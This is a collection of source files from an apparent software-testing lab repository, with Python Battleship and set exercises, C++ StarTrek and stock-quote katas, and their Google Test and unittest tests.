"length_bytes": 700,
"license_type": "permissive",
"max_line_length": 53,
"num_lines": 25,
"path": "/battleship/playermap.py",
"repo_name": "driscollis/labs-cpp-gtest",
"src_encoding": "UTF-8",
"text": "class OutOfBounds(Exception):\n pass\n\nclass Map:\n def __init__(self):\n self.size = 10\n self.hit_locations = {}\n self.ship_locations = {}\n \n def valid(self, x, y):\n return x in range(1, self.size+1) and \\\n y in range(1, self.size+1) \n \n def valid_ship_position(self, x, y):\n return self.valid(x, y) and \\\n (x, y) not in self.ship_locations\n \n def attack(self, x, y):\n if not self.valid(x, y): \n raise OutOfBounds\n if (x, y) not in self.hit_locations:\n self.hit_locations[(x, y)] = True\n \n def isHit(self, x, y):\n return self.hit_locations.get((x, y), False);"
},
{
"alpha_fraction": 0.6850393414497375,
"alphanum_fraction": 0.6850393414497375,
"avg_line_length": 11.699999809265137,
"blob_id": "38d2b0c1fefa39acf7f79821760e0d68b9e58de9",
"content_id": "b5c39b11bc654bf3331fcc324c31acb42dc126dc",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 254,
"license_type": "permissive",
"max_line_length": 52,
"num_lines": 20,
"path": "/TestedTrek/TestedTrek/src/StarTrek/Phaser.h",
"repo_name": "driscollis/labs-cpp-gtest",
"src_encoding": "UTF-8",
"text": "#ifndef PHASER_HEADER\n#define PHASER_HEADER\n\nnamespace StarTrek\n{\n\nclass Phaser\n{\npublic:\n Phaser();\n ~Phaser();\n\n bool arePhasersInRange( int distance );\n int getPhaserDamage( int amount, int distance );\n\n};\n\n} // namespace StarTrek\n\n#endif\n"
},
{
"alpha_fraction": 0.5084337592124939,
"alphanum_fraction": 0.5293172597885132,
"avg_line_length": 25.510639190673828,
"blob_id": "c41259861b8e83d58b2259d1347a124b7b17d9fe",
"content_id": "19b6774d72e0391f2440abd99b19b13df8b88bcf",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1245,
"license_type": "permissive",
"max_line_length": 49,
"num_lines": 47,
"path": "/pyset/test.py",
"repo_name": "driscollis/labs-cpp-gtest",
"src_encoding": "UTF-8",
"text": "import pyset\n\nimport copy\nimport unittest\n\nclass TestSet(unittest.TestCase):\n \n def test_is_empty(self):\n my_set = pyset.Set()\n self.assertEqual(True, my_set.is_empty())\n \n def test_append(self):\n my_set = pyset.Set()\n my_set.append( 5 )\n self.assertIn( 5, my_set )\n \n def test_equals(self):\n new_list = [1, 2, 3]\n my_set = pyset.Set()\n my_set.append([1, 2, 3])\n self.assertEqual(new_list, my_set)\n self.assertEqual(my_set, my_set)\n \n def test_notequal(self):\n new_list = [1, 2, 3]\n my_set = pyset.Set()\n my_set.append([3,4,5])\n self.assertNotEqual(new_list, my_set)\n \n def test_reverse_is_equal(self):\n new_list = [1,2,3]\n reversed_list = copy.deepcopy(new_list)\n reversed_list.reverse()\n my_set = pyset.Set()\n my_set.append(reversed_list)\n self.assertEqual(new_list, my_set)\n \n def test_you_are_not_cheating(self):\n new_list = [1, 2, 3]\n my_set = pyset.Set()\n my_set.append( new_list )\n big_list = [1, 1, 2, 2, 3, 3]\n self.assertNotEqual(big_list, my_set)\n \n \nif __name__ == '__main__':\n unittest.main()"
},
{
"alpha_fraction": 0.457109272480011,
"alphanum_fraction": 0.4653348922729492,
"avg_line_length": 29.428571701049805,
"blob_id": "b90916d2ec63e331fe9e0df78bf2fd379fdd201a",
"content_id": "7afdcbeebefed82e8b15b2bba3faf6f771725ed3",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 851,
"license_type": "permissive",
"max_line_length": 66,
"num_lines": 28,
"path": "/battleship/ship.py",
"repo_name": "driscollis/labs-cpp-gtest",
"src_encoding": "UTF-8",
"text": "class InvalidBoat(Exception):\n pass\n\nclass Ship:\n def __init__(self, ship_type):\n self.type = ship_type\n self.ships = {'Aircraft carrier': 5,\n 'Battleship': 4,\n 'Cruiser': 3,\n 'Destroyer': 2,\n 'Submarine': 1,\n }\n \n if ship_type not in self.ships:\n raise InvalidBoat(\n '\"{}\" is an invalid ship type!'.format(ship_type))\n \n self.size = self.ships[self.type]\n self.hit_count = 0\n \n def it_hit(self):\n if not self.isDestroyed():\n self.hit_count += 1\n if self.hit_count == self.size:\n print 'You sunk my {}'.format(self.type)\n \n def isDestroyed(self):\n return self.hit_count == self.ships[self.type]"
},
{
"alpha_fraction": 0.6150306463241577,
"alphanum_fraction": 0.6150306463241577,
"avg_line_length": 15.300000190734863,
"blob_id": "3d608daaae2b8a0e9a9e918bb6a580fc874dd412",
"content_id": "7cdca1f3a0cae0b67e2fce7c6037ab3f6b624f7f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 652,
"license_type": "permissive",
"max_line_length": 71,
"num_lines": 40,
"path": "/MessTrek/src/StarTrek/Game.h",
"repo_name": "driscollis/labs-cpp-gtest",
"src_encoding": "UTF-8",
"text": "#ifndef GAME_HEADER\n#define GAME_HEADER\n\n#include <cstdlib>\n#include <memory>\n#include \"webgadgetproxy.h\"\n\n\nnamespace StarTrek {\n\n\nclass Game {\npublic:\n class RandomGenerator\n {\n public:\n virtual int Get( int maximum )\n {\n return rand() % maximum;\n }\n };\n\nprivate:\n int e_;\n int t_;\n std::unique_ptr<RandomGenerator> gen;\n\n int randomWithinLimitOf(int maximum) {\n return gen->Get( maximum );\n }\n\npublic:\n Game( std::unique_ptr<RandomGenerator> generator =\n std::unique_ptr<RandomGenerator>( new RandomGenerator() ));\n void fireWeapon(WebGadgetProxy& wg);\n};\n\n}\n\n#endif\n"
},
{
"alpha_fraction": 0.6792114973068237,
"alphanum_fraction": 0.6792114973068237,
"avg_line_length": 20.461538314819336,
"blob_id": "c3c684d8e95d13873f700b98685739d1d9c4caee",
"content_id": "0a7bc5963dabdf46eed017bd98b2602bd555e688",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 558,
"license_type": "permissive",
"max_line_length": 65,
"num_lines": 26,
"path": "/MessTrek/src/StarTrek/webgadgetproxy.h",
"repo_name": "driscollis/labs-cpp-gtest",
"src_encoding": "UTF-8",
"text": "#ifndef WEBGADGETPROXY_H\n#define WEBGADGETPROXY_H\n\n#include \"../Untouchables/WebGadget.h\"\n\nclass WebGadgetProxy{\npublic:\n WebGadgetProxy( Untouchables::WebGadget *wg ) : m_wg( wg ) {}\n\n virtual string parameter(string parameterName) {\n return m_wg->parameter(parameterName);\n }\n\n virtual void* variable(string variableName) {\n return m_wg->variable(variableName);\n }\n\n virtual void writeLine(string message) {\n m_wg->writeLine(message);\n }\n\nprivate:\n Untouchables::WebGadget *m_wg;\n};\n\n#endif // WEBGADGETPROXY_H\n"
},
{
"alpha_fraction": 0.5973932147026062,
"alphanum_fraction": 0.6285300254821777,
"avg_line_length": 22.406780242919922,
"blob_id": "0ef2ed266db8ae48246fd6e051e18e4f2ecfc1d9",
"content_id": "a12cec77e5ec99f61007fcc98bae6cc45cd4c466",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2762,
"license_type": "permissive",
"max_line_length": 86,
"num_lines": 118,
"path": "/LunEx/StockQuoteTests/StockQuoteTests.cpp",
"repo_name": "driscollis/labs-cpp-gtest",
"src_encoding": "UTF-8",
"text": "#include \"../src/LunExServices.h\"\n#include \"../src/stockquote.h\"\n#include \"gtest/gtest.h\"\n#include \"gmock/gmock.h\"\n\nusing ::testing::Return;\n\nclass HandMock : public LunExServices{\npublic:\n HandMock() : transactions( 0 ) {}\n\n double currentPrice( const char* symbol )\n {\n ++transactions;\n return 10.0;\n }\n\n int transactions;\n};\n\nclass GoogleMock : public LunExServices{\npublic:\n MOCK_METHOD1(currentPrice, double(const char* symbol));\n};\n\n\nTEST(StockQuotes, DISABLED_CanConstruct) {\n LunExServices l;\n StockQuote( \"MIKE\", l );\n}\n\nTEST(StockQuotes, DISABLED_ReturnsTotal) {\n LunExServices l;\n StockQuote q( \"MIKE\", l );\n EXPECT_NE( 0, q.Total( 1 ) );\n}\n\nTEST(HandMockTests, GetsCurrentPrice)\n{\n HandMock m;\n StockQuote q( \"STEVE\", m );\n EXPECT_EQ( 10.0, q.Price( 1.0 ) );\n}\n\nTEST(HandMockTests, GetsCurrentPriceMultiShare) {\n HandMock m;\n StockQuote q( \"Steve\", m );\n EXPECT_EQ( 50.0, q.Price( 5.0 ) );\n}\n\nTEST(HandMockTests, GetSameStockQuoteTwice){\n HandMock m;\n StockQuote q( \"STEVE\", m );\n EXPECT_EQ( 10.0, q.Price( 1.0 ) );\n EXPECT_EQ( 10.0, q.Price( 1.0 ) );\n}\n\nTEST(HandMockTests, GetTransactionTotal){\n HandMock m;\n StockQuote q( \"DELL\", m );\n EXPECT_EQ(112.0, q.Total( 10 ));\n}\n\nTEST(HandMockTests, OnlyOneTransaction) {\n HandMock m;\n StockQuote q( \"DELL\", m );\n q.Price( 50 );\n q.Total( 100 );\n EXPECT_EQ(1, m.transactions);\n}\n\nTEST(GoogleMockTests, GetsCurrentPrice)\n{\n GoogleMock m;\n EXPECT_CALL(m, currentPrice( ::testing::StrEq(\"STEVE\") ) ).WillOnce(Return(10.0));\n StockQuote q( \"STEVE\", m );\n EXPECT_EQ( 10.0, q.Price( 1.0 ) );\n}\n\nTEST(GoogleMockTests, GetsCurrentPriceMultiShare) {\n GoogleMock m;\n EXPECT_CALL(m, currentPrice( ::testing::StrEq(\"STEVE\") ) ).WillOnce(Return(10.0));\n StockQuote q( \"STEVE\", m );\n EXPECT_EQ( 50.0, q.Price( 5.0 ) );\n}\n\nTEST(GoogleMockTests, GetSameStockQuoteTwice){\n GoogleMock m;\n EXPECT_CALL(m, currentPrice( ::testing::StrEq(\"STEVE\") ) ).WillOnce(Return(10.0));\n StockQuote q( \"STEVE\", m );\n EXPECT_EQ( 10.0, q.Price( 1.0 ) );\n EXPECT_EQ( 10.0, q.Price( 1.0 ) );\n}\n\nTEST(GoogleMockTests, GetTransactionTotal){\n GoogleMock m;\n EXPECT_CALL(m, currentPrice( ::testing::StrEq(\"DELL\") ) ).WillOnce(Return(10.0));\n StockQuote q( \"DELL\", m );\n EXPECT_EQ(112.0, q.Total( 10 ));\n}\n\nTEST(GoogleMockTests, OnlyOneTransaction) {\n\n GoogleMock m;\n EXPECT_CALL(m, currentPrice( ::testing::StrEq(\"DELL\") ) ).WillOnce(Return(10.0));\n StockQuote q( \"DELL\", m );\n q.Price( 50 );\n q.Total( 100 );\n// EXPECT_EQ(1, m.transactions);\n}\n\nint main(int argc, char** argv)\n{\n // run all tests\n ::testing::InitGoogleMock(&argc, argv);\n\n return RUN_ALL_TESTS();\n}\n"
},
{
"alpha_fraction": 0.4885777533054352,
"alphanum_fraction": 0.4922623336315155,
"avg_line_length": 16.397436141967773,
"blob_id": "2b2f45fd190ff2c79f8d52380564c6a55274434b",
"content_id": "b70204523cef532739c3088c6ccc0d84faf8ba01",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1357,
"license_type": "permissive",
"max_line_length": 65,
"num_lines": 78,
"path": "/SuperSet/SuperSet/Set.cpp",
"repo_name": "driscollis/labs-cpp-gtest",
"src_encoding": "UTF-8",
"text": "#include \"Set.h\"\n\nSet::Set(void)\n{\n}\n\n\nSet::~Set(void)\n{\n}\n\nbool Set::isEmpty() const\n{\n return m_storage.empty();\n}\n\nvoid Set::add( unsigned int to_add )\n{\n if ( ( to_add > 0 ) && !contains(to_add) )\n {\n m_storage.push_back( to_add );\n }\n}\n\nbool Set::contains( unsigned int to_check ) const\n{\n for ( unsigned int i = 0; i < m_storage.size(); ++i )\n {\n if ( to_check == m_storage[i] )\n {\n return true;\n }\n }\n return false;\n}\n\nvoid Set::remove( unsigned int to_remove )\n{\n std::vector<unsigned int>::iterator it = m_storage.begin();\n std::vector<unsigned int>::iterator end_it = m_storage.end();\n for (; it != end_it; ++it )\n {\n if ( to_remove == *it )\n {\n m_storage.erase( it );\n return;\n }\n }\n\n}\n\nSet Set::getIntersection( const Set& other )\n{\n Set ret;\n for ( unsigned int i = 0; i < m_storage.size(); ++i )\n {\n if ( other.contains( m_storage[i] ) )\n {\n ret.add( m_storage[i] );\n }\n }\n return ret;\n}\n\nSet Set::getUnion( const Set& other )\n{\n Set ret;\n for ( unsigned int i = 0; i < m_storage.size(); ++i )\n {\n ret.add(m_storage[i]);\n }\n\n for ( unsigned int i = 0; i < other.m_storage.size(); ++i )\n {\n ret.add(other.m_storage[i]);\n }\n return ret;\n}\n"
},
{
"alpha_fraction": 0.7591623067855835,
"alphanum_fraction": 0.7591623067855835,
"avg_line_length": 14.916666984558105,
"blob_id": "dd4c020d5fc509aaf54e14a38032718279959c3e",
"content_id": "1d6d3314ccd65a17d7ef492b8ad2817c28c0adb5",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 191,
"license_type": "permissive",
"max_line_length": 31,
"num_lines": 12,
"path": "/TestedTrek/TestedTrek/src/StarTrek/RandGenerator.h",
"repo_name": "driscollis/labs-cpp-gtest",
"src_encoding": "UTF-8",
"text": "#ifndef RAND_GENERATOR_HEADER\n#define RAND_GENERATOR_HEADER\n\n#include <cstdlib>\n\ntypedef int(*Random)(void);\n\nextern Random generator;\n\nint rnd(int maximum);\n\n#endif // RAND_GENERATOR_HEADER\n"
},
{
"alpha_fraction": 0.5511197447776794,
"alphanum_fraction": 0.552093505859375,
"avg_line_length": 25.30769157409668,
"blob_id": "1c15c36923454b71912f7fa4c795914d09dd8c18",
"content_id": "a275cf51ad7ae4d8c26c02de8e52eeb4a5019a0a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1027,
"license_type": "permissive",
"max_line_length": 56,
"num_lines": 39,
"path": "/pyset/pysetlist.py",
"repo_name": "driscollis/labs-cpp-gtest",
"src_encoding": "UTF-8",
"text": "class Set(object):\n\n def __init__(self):\n self.internal_list = []\n\n def __contains__(self, item):\n if item in self.internal_list:\n return True\n else:\n return False\n\n def __repr__(self):\n return '<Set {}>'.format(self.internal_list)\n\n def __iter__(self):\n if not self.internal_list:\n raise StopIteration\n for item in self.internal_list:\n yield item\n\n def append(self, item):\n if isinstance(item, int) and item <= 0:\n # don't allow negative numbers to be added\n pass\n elif item not in self.internal_list:\n self.internal_list.append(item)\n\n def count(self, item):\n return self.internal_list.count(item)\n\n def intersection(self, other_list):\n new_list = []\n for item in other_list:\n if item not in self.internal_list:\n self.internal_list.append(item)\n\n\n def remove(self, item):\n self.internal_list.remove(item)\n\n"
},
{
"alpha_fraction": 0.572519063949585,
"alphanum_fraction": 0.5782442688941956,
"avg_line_length": 29.235294342041016,
"blob_id": "d598c495fcf19cc7046dd4c41a0a3ec259c488f4",
"content_id": "4cfa06897370cafb7891a9eab8c3d8b9d42ffcd1",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 524,
"license_type": "permissive",
"max_line_length": 51,
"num_lines": 17,
"path": "/battleship/game.py",
"repo_name": "driscollis/labs-cpp-gtest",
"src_encoding": "UTF-8",
"text": "import ship\n\nclass Game:\n def __init__(self):\n self.board_size = 10\n self.number_players = 2\n \n def generate_ship_list(self):\n ships = []\n ships.append(ship.Ship('Aircraft carrier'))\n ships.append(ship.Ship('Battleship'))\n ships.append(ship.Ship('Cruiser'))\n ships.append(ship.Ship('Destroyer'))\n ships.append(ship.Ship('Destroyer'))\n ships.append(ship.Ship('Submarine'))\n ships.append(ship.Ship('Submarine'))\n return ships\n \n \n"
},
{
"alpha_fraction": 0.5930481553077698,
"alphanum_fraction": 0.6278074979782104,
"avg_line_length": 17.33333396911621,
"blob_id": "481ecac41aed44ed583a6ae284c9ab95a8aa4207",
"content_id": "7a778f20b357b520f71fd3733f92b6f45d85349e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 3740,
"license_type": "permissive",
"max_line_length": 70,
"num_lines": 204,
"path": "/SuperSet/SetDemo/SetTests.cpp",
"repo_name": "driscollis/labs-cpp-gtest",
"src_encoding": "UTF-8",
"text": "// SetTests.cpp : Defines the entry point for the console application.\n//\n\n#include \"gtest/gtest.h\"\n#include <Set.h>\n\nTEST(SuperSet, InitializedEmpty) {\n Set set;\n EXPECT_EQ( true, set.isEmpty() );\n}\n\nTEST(SuperSet, isNotEmpty) {\n Set set;\n set.add(1);\n EXPECT_EQ( false, set.isEmpty() );\n}\n\nTEST(SuperSet, doesNotContainNaturalNumber)\n{\n Set set;\n EXPECT_EQ(false, set.contains(2));\n}\n\nTEST(SuperSet, doesContainNaturalNumber)\n{\n Set set;\n set.add(2);\n EXPECT_EQ(true, set.contains(2));\n}\n\nTEST(SuperSet, stillEmptyAddingZero)\n{\n Set set;\n set.add(0);\n EXPECT_EQ(true, set.isEmpty());\n}\n\nTEST(SuperSet, zeroNotAdded)\n{\n Set set;\n set.add(1);\n set.add(0);\n EXPECT_EQ( false, set.contains(0) );\n}\n\nTEST(SuperSet, removeItem)\n{\n Set set;\n set.add(1);\n set.remove(1);\n EXPECT_EQ( false, set.contains(1) );\n}\n\nTEST(SuperSet, removeNonExistantItem)\n{\n Set set;\n set.add(1);\n set.add(2);\n set.remove(3);\n EXPECT_EQ( true, set.contains(1) );\n EXPECT_EQ( true, set.contains(2) );\n EXPECT_EQ( false, set.contains(3) );\n}\n\nTEST(SuperSet, sameNumberAddedRemovedOnce)\n{\n Set set;\n set.add(1);\n set.add(1);\n set.remove(1);\n EXPECT_EQ( false, set.contains(1) );\n}\n\nTEST(SuperSet, sameNumberAddedThenRemovedAndReadded)\n{\n Set set;\n set.add(1);\n set.add(1);\n set.remove(1);\n set.add(1);\n EXPECT_EQ( true, set.contains(1) );\n}\n\nTEST(SuperSet, emptySetIntersections)\n{\n Set set1;\n Set set2;\n Set intersection = set1.getIntersection(set2);\n EXPECT_EQ( true, intersection.isEmpty() );\n}\n\nTEST(SuperSet, bothHaveOne)\n{\n Set set1;\n Set set2;\n set1.add(1);\n set2.add(1);\n Set intersection = set1.getIntersection(set2);\n EXPECT_EQ( true, intersection.contains(1) );\n}\n\nTEST(SuperSet, bothHaveDifferentValues)\n{\n Set set1;\n Set set2;\n set1.add(1);\n set1.add(5);\n set2.add(1);\n set2.add(2);\n Set intersection = set1.getIntersection(set2);\n EXPECT_EQ( true, intersection.contains(1) );\n EXPECT_EQ( false, intersection.contains(5) );\n}\n\nTEST(SuperSet, reversable)\n{\n Set set1;\n Set set2;\n set1.add(1);\n set1.add(5);\n set2.add(1);\n set2.add(2);\n Set intersection = set1.getIntersection(set2);\n Set intersection2 = set2.getIntersection(set1);\n\n EXPECT_EQ( true, intersection.contains(1) );\n EXPECT_EQ( false, intersection.contains(5) );\n\n EXPECT_EQ( true, intersection2.contains(1) );\n EXPECT_EQ( false, intersection2.contains(5) );\n}\n\nTEST(SuperSet, emptySetWithNonEmpty)\n{\n Set set1;\n Set set2;\n set1.add(1);\n\n Set intersection = set1.getIntersection(set2);\n EXPECT_EQ( false, intersection.contains(1) );\n EXPECT_EQ( true, intersection.isEmpty() );\n}\n\nTEST(SuperSet, emptyUnion)\n{\n Set set1;\n Set set2;\n\n Set union1 = set1.getUnion(set2);\n EXPECT_EQ( true, union1.isEmpty() );\n}\n\nTEST(SuperSet, emptyUnionPlusNonEmpty)\n{\n Set set1;\n Set set2;\n\n set1.add(1);\n\n Set union1 = set1.getUnion(set2);\n EXPECT_EQ( true, union1.contains(1) );\n}\n\nTEST(SuperSet, bothSetsHaveDataUnion)\n{\n Set set1;\n Set set2;\n\n set1.add(1);\n set2.add(2);\n\n Set union1 = set1.getUnion(set2);\n EXPECT_EQ( true, union1.contains(1) );\n EXPECT_EQ( true, union1.contains(2) );\n}\n\nTEST(SuperSet, unionIsReversible)\n{\n Set set1;\n Set set2;\n\n set1.add(2);\n set1.add(7);\n set2.add(10);\n set2.add(11);\n\n Set union_1_to_2 = set1.getUnion(set2);\n Set union_2_to_1 = set2.getUnion(set1);\n\n}\n\n\n/*TEST(SuperSet, InitialSizeIsZero) {\n Set set;\n EXPECT_EQ(0, set.size());\n}*/\n\nint main(int argc, char** argv)\n{\n // run all tests\n ::testing::InitGoogleTest(&argc, argv);\n\n return RUN_ALL_TESTS();\n}\n"
},
{
"alpha_fraction": 0.7197231650352478,
"alphanum_fraction": 0.7197231650352478,
"avg_line_length": 14.210526466369629,
"blob_id": "d0466c6b6d1b0e66c6fa6ee38a775f8a362e50af",
"content_id": "305b9590ece656fd61accdb6613746a4b255bb89",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 289,
"license_type": "permissive",
"max_line_length": 39,
"num_lines": 19,
"path": "/TestedTrek/TestedTrek/src/StarTrek/PhotonTorpedo.h",
"repo_name": "driscollis/labs-cpp-gtest",
"src_encoding": "UTF-8",
"text": "#ifndef PHOTON_TORPEDO_HEADER\n#define PHOTON_TORPEDO_HEADER\n\nnamespace StarTrek\n{\n\nclass PhotonTorpedo\n{\npublic:\n PhotonTorpedo();\n ~PhotonTorpedo();\n\n int getPhotonTorpDamage();\n bool didTorpedoHit( int distance );\n};\n\n} // namespace StarTrek\n\n#endif // PHOTON_TORPEDO_HEADER\n"
},
{
"alpha_fraction": 0.6104995608329773,
"alphanum_fraction": 0.6130397915840149,
"avg_line_length": 27.14285659790039,
"blob_id": "cf0d05d485b17e930fe0bbc9a5fad832a4ba3156",
"content_id": "144aa4ad43ee6a8d95e67f8a418d2028f962bc1b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1181,
"license_type": "permissive",
"max_line_length": 70,
"num_lines": 42,
"path": "/pyset/watcher.py",
"repo_name": "driscollis/labs-cpp-gtest",
"src_encoding": "UTF-8",
"text": "import argparse\nimport os\nimport subprocess\nimport time\n\nfrom watchdog.observers import Observer\nfrom watchdog.events import FileSystemEventHandler\n\ndef get_args():\n parser = argparse.ArgumentParser(\n description=\"A File Watcher that executes the specified tests\"\n )\n parser.add_argument('--tests', action=\"store\", required=True,\n help='The path to the test file to run')\n return parser.parse_args()\n\nclass FW(FileSystemEventHandler):\n def __init__(self, test_file_path):\n self.test_file_path = test_file_path\n\n def on_any_event(self, event):\n\n if os.path.exists(self.test_file_path):\n cmd = ['python', self.test_file_path]\n subprocess.call(cmd)\n print '-' * 70\n\nif __name__ =='__main__':\n args = get_args()\n observer = Observer()\n path = args.tests\n fobj = FW(path)\n\n if os.path.exists(path) and os.path.isfile(path):\n observer.schedule(fobj, os.path.dirname(path), recursive=True)\n observer.start()\n try:\n while True:\n time.sleep(1)\n except KeyboardInterrupt:\n observer.stop()\n observer.join()"
},
{
"alpha_fraction": 0.48273274302482605,
"alphanum_fraction": 0.4842342436313629,
"avg_line_length": 37.08571243286133,
"blob_id": "d7cc9716a45a0a94000f87c394d558f77f297977",
"content_id": "3e0061d6613be7b90c1e8fe0012c7f17ed0e675a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1332,
"license_type": "permissive",
"max_line_length": 80,
"num_lines": 35,
"path": "/battleship/player.py",
"repo_name": "driscollis/labs-cpp-gtest",
"src_encoding": "UTF-8",
"text": "class Player:\n \n def __init__(self, player_map):\n self.map = player_map\n self.ships = {}\n \n def check_location(self, ship, direction, x, y):\n if self.map.valid_ship_position(x, y):\n if direction == 'H':\n return self.map.valid_ship_position(x + ship.size - 1, y)\n else:\n return self.map.valid_ship_position(x, y + ship.size - 1)\n return False\n \n def place_ship(self, ship, direction, x, y):\n if self.check_location(ship, direction, x, y):\n if direction == 'H':\n for pos in range(x, x + ship.size):\n self.map.ship_locations[pos, y] = True\n self.ships[ship] = [(pos, y) for pos in range(x, x + ship.size)]\n else:\n for pos in range(y, y + ship.size):\n self.map.ship_locations[x, pos] = True\n self.ships[ship] = [(x, pos) for pos in range(y, y + ship.size)]\n else:\n print 'Ship cannot be placed in this location'\n \n def attack(self, x, y):\n if self.map.valid(x, y):\n self.map.attack(x, y)\n for ship in self.ships:\n if (x, y) in self.ships[ship]:\n ship.it_hit()\n return True\n return False"
},
{
"alpha_fraction": 0.33955660462379456,
"alphanum_fraction": 0.33955660462379456,
"avg_line_length": 25.8125,
"blob_id": "95de0b87091dd8ade183c5174a9c8be92d1ef65a",
"content_id": "5230ce96c4af8a80c5fe015e72d8d06932356d0a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 857,
"license_type": "permissive",
"max_line_length": 75,
"num_lines": 32,
"path": "/battleship/wxBattleship.py",
"repo_name": "driscollis/labs-cpp-gtest",
"src_encoding": "UTF-8",
"text": "# wxBattleship.py\n\nimport wx\n\n########################################################################\nclass BattleshipPanel(wx.Panel):\n \"\"\"\"\"\"\n\n #----------------------------------------------------------------------\n def __init__(self):\n \"\"\"Constructor\"\"\"\n wx.Panel.__init__(self, parent)\n \n row_sizer = wx.BoxSizer(wx.HORIZONTAL)\n \n \n########################################################################\nclass BattleshipFrame(wx.Frame):\n \"\"\"\"\"\"\n\n #----------------------------------------------------------------------\n def __init__(self):\n \"\"\"Constructor\"\"\"\n wx.Frame.__init__(self, None, title='Battleship')\n panel = BattleshipPanel(self)\n self.Show()\n \n \nif __name__ == '__main__':\n app = wx.App(False)\n frame = BattleshipFrame()\n app.MainLoop()"
},
{
"alpha_fraction": 0.6702253818511963,
"alphanum_fraction": 0.6785290837287903,
"avg_line_length": 28.034482955932617,
"blob_id": "8cf037bc9ceaf7fdcc7b662bd8690ea849ce29de",
"content_id": "2b088299475170ee81859464bb56b7bfec33f61c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1686,
"license_type": "permissive",
"max_line_length": 110,
"num_lines": 58,
"path": "/MessTrek/Tests/YourTests.cpp",
"repo_name": "driscollis/labs-cpp-gtest",
"src_encoding": "UTF-8",
"text": "\n\n#include \"gtest/gtest.h\"\n#include \"gmock/gmock.h\"\n\n#include \"StarTrek/Game.h\"\n#include \"StarTrek/Klingon.h\"\n\nusing ::testing::Return;\nusing namespace StarTrek;\n\nclass WebGadgetProxyMock : public WebGadgetProxy\n{\npublic:\n WebGadgetProxyMock() : WebGadgetProxy( NULL ) {}\n MOCK_METHOD1(parameter, string(string));\n MOCK_METHOD1(variable, void*(string));\n MOCK_METHOD1(writeLine, void(string));\n};\n\nclass KlingonMock : public Klingon\n{\npublic:\n MOCK_METHOD0(distance, int());\n MOCK_METHOD0(energy, int());\n MOCK_METHOD0(destroy, void());\n};\n\nclass RandomNumberMock : public StarTrek::Game::RandomGenerator\n{\npublic:\n MOCK_METHOD1(Get, int(int));\n\n};\n\nTEST(StarTrekCharacterization, FirePhotonDestroyKlingon) {\n std::unique_ptr<RandomNumberMock> gen( new RandomNumberMock() );\n EXPECT_CALL( *gen, Get( ::testing::_ ) ).WillRepeatedly(Return(1));\n Game g( std::move( gen ) );\n WebGadgetProxyMock wg;\n KlingonMock kl;\n EXPECT_CALL( wg, parameter( ::testing::StrEq(\"command\"))).WillRepeatedly(Return(string(\"photon\")));\n EXPECT_CALL( wg, variable( ::testing::StrEq(\"target\"))).WillOnce(Return((void*)&kl));\n EXPECT_CALL( wg, writeLine( \"Photons hit Klingon at 0 sectors with 801 units\" )).WillRepeatedly(Return());\n EXPECT_CALL( wg, writeLine( \"Klingon destroyed!\" )).WillRepeatedly(Return());\n EXPECT_CALL( kl, distance() ).WillOnce(Return(0));\n EXPECT_CALL( kl, energy() ).WillOnce(Return(1));\n EXPECT_CALL( kl, destroy() ).WillOnce( Return() );\n g.fireWeapon( wg );\n}\n\n\nint main(int argc, char** argv)\n{\n StarTrek::Game game;\n // run all tests\n ::testing::InitGoogleTest(&argc, argv);\n\n return RUN_ALL_TESTS();\n}\n"
},
{
"alpha_fraction": 0.6051374077796936,
"alphanum_fraction": 0.6075268983840942,
"avg_line_length": 23.799999237060547,
"blob_id": "23856e04628ace1a1df0396f75e403b912c98fd0",
"content_id": "514b9e7521dfeef170fab9f0c08ef0b054cf148f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 3348,
"license_type": "permissive",
"max_line_length": 103,
"num_lines": 135,
"path": "/TestedTrek/TestedTrek/src/StarTrek/Game.cpp",
"repo_name": "driscollis/labs-cpp-gtest",
"src_encoding": "UTF-8",
"text": "#include \"stdafx.h\"\n\n#include <sstream>\n\n#include \"Game.h\"\n#include \"Klingon.h\"\n#include \"Galaxy.h\"\n\nnamespace StarTrek {\n\nGame::Game() : phaser_ammo(10000), photon_torpedos(8) {\n generator = &rand;\n}\n\nvoid Game::fireWeapon(Galaxy& galaxy) {\n Klingon* enemy = (Klingon*)galaxy.variable(\"target\");\n int distance = -1;\n if ( enemy )\n {\n distance = enemy->distance();\n }\n\n if (galaxy.parameter(\"command\") == \"phaser\") {\n int amount = atoi(galaxy.parameter(\"amount\").c_str());\n attackWithPhaser( enemy, amount, distance, galaxy );\n\n } else if (galaxy.parameter(\"command\") == \"photon\") {\n attackPhotonTorpedo( enemy, distance, galaxy );\n }\n}\n\nvoid Game::fireWeapon(Untouchables::WebGadget* webGadget) {\n Galaxy galaxy(webGadget);\n fireWeapon(galaxy);\n}\n\nint Game::energyRemaining(void) {\n return phaser_ammo;\n}\n\nint Game::torpedoes(void) {\n return photon_torpedos;\n}\n\nvoid Game::torpedoes(int value) 